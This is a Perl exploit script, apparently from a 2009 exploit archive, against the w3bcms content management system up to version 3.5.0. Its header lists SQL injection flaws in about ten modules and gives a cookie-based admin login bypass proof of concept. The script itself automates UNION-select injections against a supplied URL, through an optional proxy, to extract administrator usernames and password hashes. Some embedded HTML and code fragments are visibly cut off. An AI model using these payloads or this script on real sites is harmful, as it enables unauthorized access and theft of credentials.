#!/usr/bin/perl use LWP::UserAgent; use HTTP::Request::Common qw(POST); use Getopt::Long; # \#'#/ # (-.-) # -------------------oOO---(_)---OOo------------------ # | __ __ | # | _____/ /_____ ______/ /_ __ ______ ______ | # | / ___/ __/ __ `/ ___/ __ \/ / / / __ `/ ___/ | # | (__ ) /_/ /_/ / / / /_/ / /_/ / /_/ (__ ) | # | /____/\__/\__,_/_/ /_.___/\__,_/\__, /____/ | # | Security Research Division /____/ 2oo9 | # ---------------------------------------------------- # | w3bcms <= v3.5.0 Multiple Remote Vulnerabilities | # | (requires magic_quotes_gpc = Off) | # ---------------------------------------------------- # [!] Discovered.: DNX # [!] Vendor.....: http://www.w3bcms.de # [!] Detected...: 11.01.2009 # [!] Reported...: 17.01.2009 # [!] Response...: 19.01.2009 # # [!] Background.: CMS features in the frontend: # » Ausgabe angelegter Seiten # » Integrierter sicherer Spamschutz (kein Captcha!) # » CMS Features wie Slogan Rotation, Datumausgabe, Seitenanzeige # » Integrierter Besuchercounter (versteckt/sichtbar) # » Sicherheit gegen Hackangriffe # » Schnelle Datenbankabfragen # » 100% Suchmaschinenoptimiert (SEO) # » Erweiterbar durch Module & Addons # » Unterstützt Mod Rewrite URL's (optional) # # # [!] Info.......: Insecure Cookie Handling in Admin Backend Login # [!] Bug........: $_COOKIE["cms_admin"] in admin/index.php near line 67 # # 67: if ($_COOKIE["cms_admin"] != "") { # 68: # 69: $admin = mysql_fetch_assoc(mysql_query("SELECT * FROM admin WHERE cookie='".$_COOKIE["cms_admin"]."'")); # 70: # 71: if ($admin['benutzername'] != "") { # 72: # 73: $_SESSION['login'] = true; # 74: header("Location: inc/index.php?seite=uebersicht"); # 75: exit; # 76: # 77: } # 78: # 79: } # # [!] PoC........: javascript:document.cookie = "cms_admin=' or '1'='1; path=/"; # # # [!] Info.......: Downloads module v1.5.0 # [!] Bug........: $_GET['id'] in includes/module/downloads/index.inc.php near line 15 # # 15: if (isset($_GET['action']) && $_GET['action'] == "klick") { # 16: # 17: $data = mysql_fetch_assoc(mysql_query("SELECT * FROM modul_downloads WHERE id='".$_GET['id']."'")); # 18: mysql_query("UPDATE modul_downloads SET klicks=klicks+1 WHERE id='".$_GET['id']."'"); # 19: $url = preg_replace('(%PAGE_DIR%)', $settings['page_dir'], $data['url']); # 20: header("Location: ".$url.""); # 21: exit; # 22: # 23: } # # # [!] Info.......: News module v1.5.0 # [!] Bug........: $_GET['action'] in includes/module/news/index.inc.php near line 131 # # 131: $kcheck = eregi ("kommentar", $_GET['action']); # # 135: if ($kcheck == "1") { # 136: # 137: $str = $_GET['action']; # 138: $explode = explode(".",$str); # 139: # 140: $ausgabe = mysql_fetch_assoc(mysql_query("SELECT * FROM modul_news WHERE id='".$explode[0]."' AND status='0'")); # # # [!] Info.......: Portfolio module v2.0.0 # [!] Bug........: $_GET['action'] in includes/module/portfolio/index.inc.php near line 75 # # 75: $kcheck = eregi ("show", $_GET['action']); # 76: # 77: if ($kcheck == "1") { # 78: # 79: $str = $_GET['action']; # 80: $explode = explode(".",$str); # 81: # 82: $ausgabe = mysql_fetch_assoc(mysql_query("SELECT * FROM modul_portfolio WHERE id='".$explode[0]."'")); # # # [!] Info.......: Partner module v1.5.0 # [!] Bug........: $_GET['id'] in includes/module/partner/index.inc.php near line 15 # # 15: if (isset($_GET['action']) && $_GET['action'] == "klick") { # 16: # 17: $data = mysql_fetch_assoc(mysql_query("SELECT * FROM modul_partner WHERE id='".$_GET['id']."'")); # 18: mysql_query("UPDATE modul_partner SET klicks=klicks+1 WHERE id='".$_GET['id']."'"); # 19: # 20: header("Location: ".$data['url'].""); # 21: exit; # 22: # 23: } # # # [!] Info.......: Mediathek module v1.5.0 # [!] Bug........: $_GET['id'] in includes/module/mediathek/index.inc.php near line 15 # # 15: if (isset($_GET['action']) && $_GET['action'] == "klick") { # 16: # 17: $data = mysql_fetch_assoc(mysql_query("SELECT * FROM modul_mediathek WHERE id='".$_GET['id']."'")); # 18: mysql_query("UPDATE modul_mediathek SET klicks=klicks+1 WHERE id='".$_GET['id']."'"); # 19: # 20: $mediafile = $settings['page_dir']."/includes/media/".$data['mediafile']; # 21: # 22: header("Location: ".$mediafile.""); # 23: exit; # 24: # 25: } # # # [!] Info.......: Sitemap module v1.5.0 # [!] Bug........: $_GET['seite'] in includes/module/sitemap/index.inc.php near line 15 # # 15: $explode = explode(".",$_GET['seite']); # # 19: $menu = mysql_query("SELECT * FROM pages WHERE submenu='0' AND aktiv='0' AND hidden='0' AND id!='".$explode['0']."' ORDER by sortierung"); # # # [!] Info.......: Links module v1.5.0 # [!] Bug........: $_GET['id'] in includes/module/links/index.inc.php near line 15 # # 15: if (isset($_GET['action']) && $_GET['action'] == "klick") { # 16: # 17: $data = mysql_fetch_assoc(mysql_query("SELECT * FROM modul_links WHERE id='".$_GET['id']."'")); # 18: mysql_query("UPDATE modul_links SET klicks=klicks+1 WHERE id='".$_GET['id']."'"); # 19: header("Location: ".$data['url'].""); # 20: exit; # 21: # 22: } # # # [!] Info.......: Blog module v1.5.0 # [!] Bug........: $_GET['action'] in includes/module/blog/index.inc.php near line 133 # # 131: $kcheck = eregi ("kommentar", $_GET['action']); # # 135: if ($kcheck == "1") { # 136: # 137: $str = $_GET['action']; # 138: $explode = explode(".",$str); # 139: # 140: $ausgabe = mysql_fetch_assoc(mysql_query("SELECT * FROM modul_blog WHERE id='".$explode[0]."' AND status='0'")); # # # [!] Info.......: Suche module v1.5.0 # [!] Bug........: $_POST['suchbegriff'] in includes/module/suche/index.inc.php near line 66 # # 66: $eingabe = trim(strip_tags($_POST['suchbegriff'])); # 67: $eingabe_array = explode(" ", $eingabe); # 68: $eingabe_array = array_unique($eingabe_array); # 69: # 70: if ($eingabe == "" || $_POST['suchbegriff'] == "Suchbegriff(e) ..."){ # 71: # 72: echo "

Fehler - Bitte mindestens ein Suchbegriff eingegeben!

"; # 73: # 74: } else { # # 78: $query_pages = "SELECT id, titel, inhalt, page FROM pages WHERE "; # 79: # 80: for ($i=0; $i"; print "\n[!] Example: perl w3blabor.pl -1 -u \"http://127.0.0.1/w3b/index.php?seite=2.down&action=klick&id=1\""; print "\n[!] Targets:"; print "\n -1 Exploit over Downloads module v1.5.0"; print "\n -2 Exploit over News module v1.5.0"; print "\n -3 Exploit over Portfolio module v2.0.0"; print "\n -4 Exploit over Partner module v1.5.0"; print "\n -5 Exploit over Mediathek module v1.5.0"; print "\n -6 Exploit over Sitemap module v1.5.0"; print "\n -7 Exploit over Links module v1.5.0"; print "\n -8 Exploit over Blog module v1.5.0"; print "\n -9 Exploit over Suche module v1.5.0"; print "\n -10 Exploit over Gallery module v1.5.0"; print "\n[!] Options:"; print "\n -u [url] URL to vuln website"; print "\n -p [ip:port] Proxy support"; print "\n"; exit; } my $ua = LWP::UserAgent->new(); my $response = ""; my %options = (); GetOptions(\%options, "1", "2", "3", "4", "5", "6", "7", "8", "9", "10", "u=s", "p=s"); if($options{"p"}) { $ua->proxy('http', "http://".$options{"p"}); } if($options{"1"}) { use_download_bug(); } elsif($options{"2"}) { use_news_bug(); } elsif($options{"3"}) { use_portfolio_bug(); } elsif($options{"4"}) { use_partner_bug(); } elsif($options{"5"}) { use_mediathek_bug(); } elsif($options{"6"}) { use_sitemap_bug(); } elsif($options{"7"}) { use_links_bug(); } elsif($options{"8"}) { use_blog_bug(); } elsif($options{"9"}) { use_suche_bug(); } elsif($options{"10"}) { use_gallery_bug(); } sub use_download_bug { my $url_user = $options{"u"}; my $url_pass = $options{"u"}; my $exploit_user = "id='%20union%20select 1,2,benutzername,4,5%20from%20admin%20limit%201/*"; my $exploit_pass = "id='%20union%20select 1,2,passwort,4,5%20from%20admin%20limit%201/*"; $url_user =~ s/id=\d+/$exploit_user/i; $response = $ua->get($url_user); $response->base =~ /.*\/(.*?)$/; my $user = $1; $url_pass =~ s/id=\d+/$exploit_pass/i; $response = $ua->get($url_pass); $response->base =~ /.*\/(.*?)$/; my $pass = $1; print $user.":".$pass; } sub use_news_bug { my $url = $options{"u"}; my $exploit = "action='%20union%20select%201,2,3,4,benutzername,6,passwort%20from%20admin%20limit%201/*"; $url =~ s/action=\d+/$exploit/i; $response = $ua->get($url); if($response->content =~ /

(.*?)<\/p>.*([a-fA-F0-9]{32})<\/div>/s) { print $1.":".$2; } } sub use_portfolio_bug { my $url = $options{"u"}; my $exploit = "action='%20union%20select%201,2,passwort,benutzername,5,6,7,8,9,10,11,12,13,14,15,16%20from%20admin%20limit 1/*"; $url =~ s/action=\d+/$exploit/i; $response = $ua->get($url); if($response->content =~ /

([a-fA-F0-9]{32})<\/h1>.*?

(.*?)<\/p>/s) { print $2.":".$1; } } sub use_partner_bug { my $url_user = $options{"u"}; my $url_pass = $options{"u"}; my $exploit_user = "id='%20union%20select 1,2,benutzername,4,5%20from%20admin%20limit%201/*"; my $exploit_pass = "id='%20union%20select 1,2,passwort,4,5%20from%20admin%20limit%201/*"; $url_user =~ s/id=\d+/$exploit_user/i; $response = $ua->get($url_user); $response->base =~ /.*\/(.*?)$/; my $user = $1; $url_pass =~ s/id=\d+/$exploit_pass/i; $response = $ua->get($url_pass); $response->base =~ /.*\/(.*?)$/; my $pass = $1; print $user.":".$pass; } sub use_mediathek_bug { my $url_user = $options{"u"}; my $url_pass = $options{"u"}; my $exploit_user = "id='%20union%20select 1,2,benutzername,4%20from%20admin%20limit%201/*"; my $exploit_pass = "id='%20union%20select 1,2,passwort,4%20from%20admin%20limit%201/*"; $url_user =~ s/id=\d+/$exploit_user/i; $response = $ua->get($url_user); $response->base =~ /.*\/(.*?)$/; my $user = $1; $url_pass =~ s/id=\d+/$exploit_pass/i; $response = $ua->get($url_pass); $response->base =~ /.*\/(.*?)$/; my $pass = $1; print $user.":".$pass; } sub use_sitemap_bug { my $url = $options{"u"}; $url =~ /seite=(\d+)\./; my $id = $1; my $exploit = "seite=".$id."'%20union%20select%201,benutzername,passwort,4,5,6,7,8,9,10,11,12,13,14,15%20from%20admin%20/*"; $url =~ s/seite=\d+/$exploit/i; $response = $ua->get($url); if($response->content =~ /$id\.<\/strong>.*?get($url_user); $response->base =~ /.*\/(.*?)$/; my $user = $1; $url_pass =~ s/id=\d+/$exploit_pass/i; $response = $ua->get($url_pass); $response->base =~ /.*\/(.*?)$/; my $pass = $1; print $user.":".$pass; } sub use_blog_bug { my $url = $options{"u"}; my $exploit = "action='%20union%20select%201,2,3,4,benutzername,6,passwort%20from%20admin%20limit%201/*"; $url =~ s/action=\d+/$exploit/i; $response = $ua->get($url); if($response->content =~ /

(.*?)<\/p>.*([a-fA-F0-9]{32})<\/div>/s) { print $1.":".$2; } } sub use_suche_bug { my $url = $options{"u"}."&action=senden"; my $search = "###___###%'))/**/union/**/select/**/1,benutzername,passwort,4/**/from/**/admin/*"; my $req = POST $url, [suchbegriff => $search]; my $response = $ua->request($req); if($response->content =~ /.*">(.*?)<\/a>
([a-fA-F0-9]{32}) \[/s) { print $1.":".$2; } } sub use_gallery_bug { my $url = $options{"u"}; my $exploit = "action='%20union%20select%201,2,passwort,4,benutzername,6%20from%20admin/*"; $url =~ s/action=\d+/$exploit/i; $response = $ua->get($url); my @content = split(/\n/, $response->content); foreach (@content) { if($_ =~ /\/([a-fA-F0-9]{32})" rel="lytebox\[.*?\]" title="(.*?)"/) { print $2.":".$1."\n"; } } }